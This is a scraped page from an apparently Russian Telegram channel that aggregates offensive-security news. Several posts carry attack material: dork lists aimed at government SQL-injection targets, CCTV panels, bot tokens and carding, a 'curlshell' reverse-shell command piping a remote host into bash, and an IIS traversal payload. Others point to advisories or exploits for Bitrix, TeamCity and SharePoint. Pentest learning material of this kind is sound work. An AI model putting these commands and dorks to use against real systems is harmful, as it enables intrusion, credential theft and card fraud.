Pentester's Backlog
@pentestbacklog
592 subscribers
313 photos
15 videos
44 files
426 links
Агрегатор новостей из мира наступательной безопасности.

EDUCATIONAL PURPOSES ONLY
Download Telegram
About
Blog
Apps
Platform
Join
Pentester's Backlog
592 subscribers
Pentester's Backlog
#pentest #web
117 viewsvale!
Pentester's Backlog
Forwarded from C.I.T. Security
Github dorks

https://github.com/techgaun/github-dorks
https://github.com/jcesarstef/ghhdb-Github-Hacking-Database
https://github.com/H4CK3RT3CH/github-dorks
https://github.com/Vaidik-pandya/Github_recon_dorks/blob/main/gitdork.txt (for finding files)


Shodan dorks

https://github.com/blaCCkHatHacEEkr/PENTESTING-BIBLE/blob/master/1-part-100-article/google/Shodan%20Queries.txt
https://github.com/humblelad/Shodan-Dorks
https://github.com/AustrianEnergyCERT/ICS_IoT_Shodan_Dorks
https://github.com/lothos612/shodan
https://github.com/jakejarvis/awesome-shodan-queries
https://github.com/IFLinfosec/shodan-dorks
https://www.osintme.com/index.php/2021/01/16/ultimate-osint-with-shodan-100-great-shodan-queries/


Netlas dorks

https://github.com/netlas-io/netlas-dorks


Censys dorks

https://github.com/thehappydinoa/awesome-censys-queries

Virus Total dorks

https://github.com/Neo23x0/vti-dorks


Binary Edge + Shodan + Google

https://github.com/iGotRootSRC/Dorkers


Google, Bing, Ecosia, Yahoo or Yandex

https://github.com/Zarcolio/sitedorks


Google dorks

https://github.com/BullsEye0/google_dork_list
https://github.com/sushiwushi/bug-bounty-dorks
https://github.com/rootac355/SQL-injection-dorks-list
https://github.com/unexpectedBy/SQLi-Dork-Repository
https://github.com/thomasdesr/Google-dorks
https://github.com/arimogi/Google-Dorks
https://github.com/aleedhillon/7000-Google-Dork-List


Onion dorks

Dorks for searching .onion sites saved in oniline proxies services https://github.com/cipher387/Dorks-collections-list/blob/main/onion.txt

CCTV dorks

Dorks for search CCTV cams admin panels https://github.com/cipher387/Dorks-collections-list/blob/main/cctv.txt
Camera dorks from @tru_1veresk https://github.com/iveresk/camera_dorks/blob/main/dorks.json
Google Dorks of Live Webcams, CCTV etc. (from d4msec) https://d4msec.wordpress.com/2015/09/05/google-dorks-of-live-webcams-cctv-etc-google-unsecured-ip-cameras/

Backlink dorks

List https://github.com/alfazzafashion/Backlink-dorks
Explanation https://www.techywebtech.com/2021/08/backlink-dorks.html
1150 dorks for forum hunting https://www.blackhatworld.com/seo/get-backlinks-yourself-1150-dorks-for-forum-hunting.380843/

Token dorks

Discord Bots Tokens https://github.com/traumatism/get-discord-bots-tokens-with-google

Hidden files dorks

Universal for Google, Bing etc

https://github.com/0xAbbarhSF/Info-Sec-Dork-List/blob/main/hidden_files_dork.txt

Admin panel dorks


https://github.com/cyberm0n/admin-panel-dorks/blob/main/dorks.txt

SQL injection dorks

SQL injection dorks for goverment sites https://github.com/readloud/Google-Hacking-Database-GHDB/blob/main/sql_gov_dorks.txt
SQL injection dorks 2019 https://github.com/readloud/Google-Hacking-Database-GHDB/blob/main/sqli_dork_2019.txt

Linkedin dorks (Google X-Ray search for Linkedin)

Linkedin X-Ray search queries and tools https://github.com/krlabs/linkedin-dorks

Carding dorks

1170 carding dorks https://pastebin.com/GYXLqgU0
17K carding dorks 2019 https://pastebin.com/fgdZxy74

Gaming dorks

7K Gaming Dorks From My Shop https://pastebin.com/ajuixpY2
Minecraft https://pastebin.com/ssNgdTkC

Shopping dorks

10k Amazon dorks https://pastebin.com/1HrmzFre
820 shopping Dorks for SQLi https://pastebin.com/1kED1FDX

Cryptocurrency dorks
15K dorks to find vulnerable pages related to cryptocurrency exchanges, cryptocurrency payments, etc. https://www.scribd.com/document/384770530/15k-Btc-Dorks

18K Bitcoin and other cryptocurency related dorks https://pdfcoffee.com/18k-bitcoin-dorks-list--3-pdf-free.html


Bug Bounty Dorks

https://github.com/hackingbharat/bug-bounty-dorks-archive/blob/main/bbdorks
https://github.com/Vinod-1122/bug-bounty-dorks/blob/main/Dorks.txt

GIT files Dorks

https://github.com/Proviesec/google-dorks/blob/main/google-dorks-for-git-files.txt

Log files Dorks

https://github.com/Proviesec/google-dorks/blob/main/google-dorks-best-log.txt

CMS Dorks

Wordpress https://pastebin.com/A9dsmgHQ
Magento https://pastebin.com/k75Y2QhF
Joomla https://pastebin.com/vVQFTzVC

Cloud instance dorks
GitHub
GitHub - techgaun/github-dorks: Find leaked secrets via github search
Find leaked secrets via github search. Contribute to techgaun/github-dorks development by creating an account on GitHub.
152 viewsvale!
Pentester's Backlog
#pentest #web

АЛЯРМ АЛЯРМ
138 viewsvale!
Pentester's Backlog
Forwarded from Кавычка (Bo0oM)
#bitrix 🚨🚨🚨

Уязвимость модуля landing системы управления содержимым сайтов (CMS) 1С-Битрикс: Управление, позволяющая нарушителю выполнить команды ОС на уязвимом узле, получить контроль над ресурсами и проникнуть во внутреннюю сеть.

Bitrix > 23.850.0
RCE, CVSS 10/10

Удаляем модуль landing, если не используется. Обновляем до версии 23.850.0 и выше, если используется.

BDU:2023-05857

Че, пацаны, анимэ?
Please open Telegram to view this post
VIEW IN TELEGRAM
🤯2👾1
111 viewsvale!
Pentester's Backlog
ждём POC 😬
Please open Telegram to view this post
VIEW IN TELEGRAM
💊1
173 viewsvale!
Pentester's Backlog
#pentest #web

В свете последних событий, вдруг кто-то собирается удивить нас новыми уязвимостями в Битриксе, держите исходники

https://gitlab.com/alexprowars/bitrix/-/tree/master
GitLab
Files · master · Aleksey Bobkov / bitrix · GitLab
История версий 1С-Битрикс
168 viewsvale!
Pentester's Backlog
#pentest #web
149 viewsvale!
Pentester's Backlog
Forwarded from Proxy Bar
curlshell
reverse shell using curl
*
usage:
*
Start your listener:
./curlshell.py --certificate fullchain.pem --private-key privkey.pem --listen-port 1234

On the remote side:
curl https://curlshell:1234 | bash

download

#shell #curl
128 viewsvale!
Pentester's Backlog
#pentest #web

puredns

puredns is a fast domain resolver and subdomain bruteforcing tool that can accurately filter out wildcard subdomains and DNS poisoned entries.

It uses massdns, a powerful stub DNS resolver, to perform bulk lookups. With the proper bandwidth and a good list of public resolvers, it can resolve millions of queries in just a few minutes. Unfortunately, the results from massdns are only as good as the answers provided by the public resolvers. The results are often polluted by wrong DNS answers and false positives from wildcard subdomains.

Examples of usage:
puredns resolve domains.txt
puredns bruteforce wordlist.txt domain.com --resolvers public.txt
cat domains.txt | puredns resolve

Github
GitHub
GitHub - d3mondev/puredns: Puredns is a fast domain resolver and subdomain bruteforcing tool that can accurately filter out wildcard…
Puredns is a fast domain resolver and subdomain bruteforcing tool that can accurately filter out wildcard subdomains and DNS poisoned entries. - d3mondev/puredns
142 viewsvale!, edited  
Pentester's Backlog
^ Как однажды писал @RalfHackerChannel
1) Собрать публичные резолверы через dnsvalidator (dnsvalidator -tL https://public-dns.info/nameservers.txt -threads 100 -o resolvers.txt)
2) Взять какой-нибудь большой словарик отсюда
3) Пустить puredns bruteforce wordlist.txt domain (резолверы с файла resolvers.txt тулза подтянет автоматически)

Получится шикарный инструмент для сбора поддоменов!
182 viewsvale!, edited  
Pentester's Backlog
#pentest #web
131 viewsvale!
Pentester's Backlog
Forwarded from PT SWARM
This media is not supported in your browser
VIEW IN TELEGRAM
🔥 We have reproduced the fresh CVE-2023-42793 in JetBrains TeamCity.

Authentication bypass allows an external attacker to gain administrative access to the server and execute any commands on it.

Update your software ASAP!
🔥1
100 viewsvale!
Pentester's Backlog
#pentest

Плейлист с записями с прошедшего VolgaCTF 2023

тык
137 viewsvale!
Pentester's Backlog
Forwarded from SHADOW:Group
​​💻Что поискать на сайте с IIS?

1. Используем shortscan, для поиска коротких (а по возможности и полных) имен файлов и расширений.

2. Проверяем наличие реверс прокси и пробуем directory traversal:
/backend/ -> 10.0.0.1/api/
/backend/..%2Ftest -> 10.0.0.1/test
Подробнее можно почитать тут.

3. Когда удастся получить раскрытие файлов, смотрим ключи в web.conf и пробуем получить RCE через дисериализацию. Почитать об этом тут.

4. Пробуем грузить файлы .asp, .aspx, .ashx и тд (полный список тут)

#web #iis #rce
Please open Telegram to view this post
VIEW IN TELEGRAM
149 viewsvale!
Pentester's Backlog
Не совсем #pentest, но всё же

У Aeza появился тариф VDS на сервере Стокгольма за 109(!!!) рублей / мес.

К тому же, с этих серверов можно сканить!
на свой страх и риск, информация неточная
823 viewsvale!
Pentester's Backlog
#pentest #web
139 viewsvale!
Pentester's Backlog
Forwarded from Волосатый бублик
#web #portswigger #burp #nosql #injection

New topic on Web Security Academy — NoSQL injection

Dive into the world of NoSQL database security with the brand new NoSQL topic - read through the learning materials, then work through the labs to test your knowledge.

https://portswigger.net/web-security/nosql-injection
149 viewsvale!
Pentester's Backlog
#pentest
151 viewsvale!
Pentester's Backlog
Forwarded from Proxy Bar
CVE-2023-29357
Microsoft SharePoint Server (2019) Elevation of Privilege Vulnerability
affected from 16.0.0 before 16.0.10399.20005
exploit
140 viewsvale!
Pentester's Backlog
Всем хороших выходных!
🤝1💊1👾1
125 viewsvale!